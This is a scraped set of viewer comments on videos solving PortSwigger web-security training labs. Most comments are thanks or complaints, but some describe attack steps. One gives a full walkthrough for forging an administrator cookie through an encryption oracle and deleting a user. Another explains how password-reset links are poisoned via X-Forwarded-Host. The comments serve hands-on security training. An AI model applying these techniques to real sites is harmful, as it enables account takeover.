Відео

I wasn't able to make it work, for whatever reason I'm getting 400 ' You already have a logged in session on the site' response after using token from *dropped* request. FF and Chrome. I'll try later with a new id.

Thank You Sir for your work. It has helped, I encourage you to do more for those who want to follow the web application hacking and are determined to complete the Portswigger Labs First. Again Thank You for your work.

deliver exploit to victim never work for me, i never see an access of other Ip in my access log.

Just do some explanation if you want us to learn from you

hard one lab including following the video it costs me a lot to finish, thanks for the video!

Thank you for the helpful solution! I wanted to share an interesting detail from my experience with this lab. At first, I mistakenly used the string returned in the response body as the administrator's password. However, after carefully checking the request subdomain in Burp Collaborator, I realized that the actual password was hidden there! It was a valuable learning experience for me, and I hope this comment helps others avoid the same confusion. Thanks again for sharing the solution-it made a big difference! Best regards, C

No need to go to burp search, just send the GET /resources/js/tracking.js from http history to the repeater. Click send few times the request from the repeater and you will get the administrator API in the response.

@MichaelSommer This is the easiest part of BB first time I found it in 2019, it is still found everywhere but can't be exploited further only the origin IP shows and no one BBP accepts this they need exploitation like an internal something leak. Can you further exploit it thanks for Bounty.

What is that symbol used between username and pass word

This feels like cheating

Sir you have the pro version so it was easy for you to enumerate the password but we have community version you should also give an alternative for us😅

00:08 - Understanding session cookies and their impact on web security. 01:08 - Understanding CSRF with Non-Session Cookies and Parameters 02:26 - Updating email addresses in application settings 03:36 - Demonstrating CSRF token validation with non-session cookies in a browser environment. 04:54 - Exploration of browser interactions and CSRF prevention strategies. 06:03 - Overview of CSRF token security challenges with non-session cookies. 07:22 - Using proxy tools for CSRF token generation. 09:23 - Discussion on how cookies impact CSRF security.

where did you click to get another host parameter in the request section? You just clicked somewhere outside the screen and suddenly another host parameter popped up, where did you click? 3.59 to 4.01?

Hi Michael, you didn't tell us why you edited that request page on repeater. Its not about just solving the lab. We need to understand the fundamentals.

Entere website any username media have crime practice the Will in wipe out of connect suitable system.

For anyone who are new here from the Port Swingger websites and this doesn't work out for you: Remember to add "%3b%20SameSite=None" at the end of the cookie as the Solution suggest Change the Head to HTTP/2 (Not HTTP/1.1) inside the email value: change it to @ instead of %40 or it'll be encoded to %2540 Pay close attention to the URL Good luck hacking I can change the victim's email by using the view exploit but when I send it didn't register as complete lol

if anyone needs

if anyone needs

I did 100% same but not solved just shit video

I did it!!!

can you help me to resolve the issue java Exploit.java Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true /home/kali/Downloads/Explit/data/productcatalog/ProductTemplate.java:3: error: package common.db does not exist import common.db.JdbcConnectionBuilder; ^ 1 error error: compilation failed

Thanksss!

to anyone that can't find or open 'git cola' just install any .git reader from your browser, it doesn't matter

Sir but I am having community issues is there any solution to community edition ???

Just simply add the injected query here so people can see and reuse it.

I'm kind of disappointed in Michael's solutions as he does not explain what each step does. Getting the lab solved is not really the point if one wants to learn how to do it from scratch.

you don't explain anything

Thanks man 👍

I don't understand why the get request to my account triggers the macro. After the macro testing part, going to intruder to spam the account page with get request seems unrelated.

Why we have to put add button twice?

my lab didn't solved i also tried to put it at the url yet it still doesn't solved my lab, it give me alert but doesn't solved the lab, any help?

i cannot catch what you saying, even using closed caption not helping me.thanks

That would be great if you explain in more dept. now it is just like you are showing the functions of burp.

Thanks a lot for your solution using git cola.

That not working for me After the creation with ""logo_uri"" it's good but when I take the "client_id": and past it on this request -> GET /client/N084rdIDBx3QaInf-95/logo I have a "Internal Server Error"

you are the worst tbh!!

kill me

For those who didn’t get it, setting the X-Forwarded-Host header tricks the backend server into generating a password reset link pointing to your exploit server. The frontend server is expected to pass this header to the backend, but since you set it, the link ends up pointing to your server. When the victim clicks the link, their reset token is sent to your server. This lets you capture the token and reset their password..

I think the videos from this channel should be banned from portswigger official solutions

this channel is harmful for the internet and security community due to the lack of explanation basically at every of the videos. guaranteed frustration if want to "understand" by these videos

why no sound ?

Has anybody been able to solve this lab recently?

1. Initial Setup and Observations Log In and Stay Logged In: Log in with the "Stay logged in" option enabled. Post a comment and observe the requests and responses using Burp Suite. Note the encrypted stay-logged-in cookie. Invalid Email Address Submission: Try submitting a comment with an invalid email address. Observe that a notification cookie is set and includes your email in cleartext. 2. Encryption and Decryption Exploration Burp Repeater Setup: Send the POST /post/comment request to Burp Repeater and rename the tab to "encrypt". Send the GET /post?postId=x request (with the notification cookie) to Burp Repeater and rename the tab to "decrypt". Encrypt and Decrypt Data: Use the email parameter in the "encrypt" request to generate an encrypted cookie. Use the notification cookie in the "decrypt" request to decrypt data and see the output in the error message. 3. Exploiting the Encryption Decrypt Stay-Logged-In Cookie: Copy your stay-logged-in cookie and paste it into the notification cookie in the "decrypt" request. Send the request and note the decrypted format: username:timestamp. Create Administrator Cookie: Copy the timestamp from the decrypted stay-logged-in cookie. In the "encrypt" request, set the email parameter to administrator:your-timestamp (replace your-timestamp with the actual timestamp). Send the request and copy the new encrypted notification cookie. 4. Bypassing the Encryption Prefix Handle Prefix in Decrypted Message: Decrypt the new cookie and observe the "Invalid email address: " prefix. URL-decode and Base64-decode the cookie in Burp Decoder. Adjust for Block-Based Encryption: In Burp Repeater, delete the first 23 bytes from the decoded data. Pad the email parameter with 9 characters to make the data length a multiple of 16, e.g., xxxxxxxxxadministrator:your-timestamp. Encrypt and decrypt the adjusted data to ensure it's valid. 5. Using the Self-Made Cookie Remove Prefix and Finalize Cookie: Delete 32 bytes from the start of the decoded data after ensuring the length is correct. Re-encode the data and use it as the notification cookie. Gain Admin Access: Send the GET / request with the new stay-logged-in cookie (replace the session cookie) in Burp Repeater. Verify that you are logged in as the administrator. Delete User: Browse to /admin and use the delete option to remove the user carlos (e.g., /admin/delete?username=carlos).

can follow but i won't be able to use this technique in my real life ever....there are lot of the assumption there...which i have no clues on it.

This guy explain it better: ua-cam.com/video/kIRIV-BwBTE/v-deo.htmlsi=7hZU-182VJU00gI3

From CL.TE to TE.CL without much explanation, oh portswigger u did me dirty!!!

I was hoping this was more of an explanation of the attack, why it works on this lab, etc. Instead it is just a word for word video detail of the solution posted on the lab. As other commenters have commented, I would have expected new codes to be generated each time the macro runs. Still not clear on *exactly* what is happening here, just that following the steps leads to a successful login.

if you have not burpsuite professional get help from python :)

Giving us the solution is nice enough, but I was expecting an exaplanation too.

hey i have burp pro, but i can't find the subdomain im supposed to use for collaborator. you see how you posted in that long string? how did you do that? where did you get it from? OHHHH i got it. when you click the clipboard button, it pastes your collaborator domain to your clip board ha. damn. thanks.